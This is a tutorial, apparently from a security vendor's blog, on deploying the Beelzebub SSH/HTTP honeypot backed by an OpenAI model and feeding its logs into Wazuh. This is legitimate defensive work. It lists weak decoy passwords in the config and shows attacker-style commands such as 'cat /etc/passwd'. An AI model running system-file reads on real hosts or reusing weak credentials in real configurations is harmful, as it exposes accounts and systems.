Deploying an AI Honeypot with Beelzebub + OpenAI: Smarter Traps for Smarter Attackers

What if your honeypot could talk back?

? What Is a Honeypot and Why Use One?

In cybersecurity, a honeypot is a decoy system designed to lure in attackers. It acts like a vulnerable server, tempting adversaries to interact with it so you can observe their behavior — all without putting real assets at risk.

Traditional honeypots are static. They use canned responses and limited simulation. They work — but they’re easy to fingerprint. Once attackers realize the system isn’t real, they back off or avoid it entirely.

That’s where Beelzebub comes in.

? Beelzebub: The Honeypot with an LLM Brain

Beelzebub is an open-source honeypot framework that integrates large language models (LLMs) like OpenAI’s GPT-4to simulate realistic, dynamic system behavior.

With LLM integration, Beelzebub can:

Generate terminal-like responses on the fly
Simulate file system changes
Maintain session context
Respond to complex attacker commands

You’re no longer limited to hard-coded scripts. Instead, the honeypot can respond intelligently, just like a real Linux terminal — because it’s powered by AI.

? Deploying Beelzebub via Docker

Beelzebub supports deployment via:

Docker / Docker Compose
Native Go compiler builds
Helm charts for Kubernetes

For this walkthrough, we’ll use Docker Compose — the easiest way to get up and running.

?️ Step-by-Step Setup

Clone the repo:

git clone https://github.com/mariocandela/beelzebub.git
cd beelzebub

2. Modify your config:

apiVersion: "v1"
protocol: "ssh"
address: ":2222"
description: "SSH interactive OpenAI  GPT-4"
commands:
  - regex: "^(.+)$"
    plugin: "LLMHoneypot"
serverVersion: "OpenSSH"
serverName: "ubuntu"
passwordRegex: "^(root|qwerty|Smoker666|123456|jenkins|minecraft|sinus|alex|postgres|Ly123456)$"
deadlineTimeoutSeconds: 60
plugin:
   llmProvider: "openai"
   llmModel: "gpt-4o"
   openAISecretKey: "sk-proj-123456"
   prompt: "You will act as an Ubuntu Linux terminal. The user will type commands, and you are to reply with what the terminal should show. Your responses must be contained within a single code block."

3. Build the Docker container:

docker compose build

4. Run the honeypot:

docker compose up -d

5. Expose it (optional) to the public internet by adjusting Docker port bindings or deploying in DMZ.

Why OpenAI + Honeypots Is a Game-Changer

Once your honeypot is live with LLM support, attackers connecting over SSH or browsing your fake HTTP services will receive believable, dynamic, and context-aware responses.

For example:

whoami → returns root
touch test.txt && ls → LLM remembers the file and shows it
cat /etc/passwd → generates plausible output

You can even simulate realistic HTTP endpoints like /wp-login.php, /admin, or /api/user, with the LLM generating fake logins or API replies on the fly.

Integrating with Wazuh for Detection

Once you’ve configured your Beelzebub instance to log events (via beelzebub.yaml), you can:

Output logs to /opt/beelzebub/logs/beelzebub.log
Mount that log file into your host via Docker volume
Configure the Wazuh agent to monitor it as a JSON log source

<localfile>
      <log_format>json</log_format>
      <location>/opt/beelzebub/logs/beelzebub.log</location>
    </localfile>

Create custom Wazuh rules to detect:
SSH connections to the honeypot
Suspicious command execution
HTTP scanner behavior

Example rule snippet: https://github.com/socfortress/Wazuh-Rules/blob/main/Beelzebub/100660-beelzebub.xml

This way, you not only trap attackers, but log everything they do — and feed it right into your SIEM for alerting, threat hunting, or incident response.

⚠️ Watch Out: OpenAI API Usage = $$$

If you expose your honeypot to the internet and enable OpenAI integration, each command processed by the LLM consumes tokens — and that costs money.

Recommendations:

Use rate limits
Avoid overly permissive regex (^.*$)
Consider using a local model (e.g., Ollama, LM Studio, GPT4All) if you want to simulate responses offline
Monitor API usage through the OpenAI dashboard

Testing the Honeypot

Once deployed:

SSH to port 2222 and use one of the default passwords (e.g., root)
Run commands like:

uname -a
whoami
touch /tmp/test.txt
cat /tmp/test.txt

Beelzebub is one of the most exciting honeypot frameworks I’ve tested lately — thanks to its:

Plug‑and‑play configuration via YAML
Multi‑protocol support (SSH, HTTP, MCP, MySQL, etc.)
AI integration for dynamic, believable deception
Easy Docker deployment
Open-source nature

Need Help?

The functionality discussed in this post, and so much more, are available via the SOCFortress platform. Let SOCFortress help you and your team keep your infrastructure secure.

Website: https://www.socfortress.co/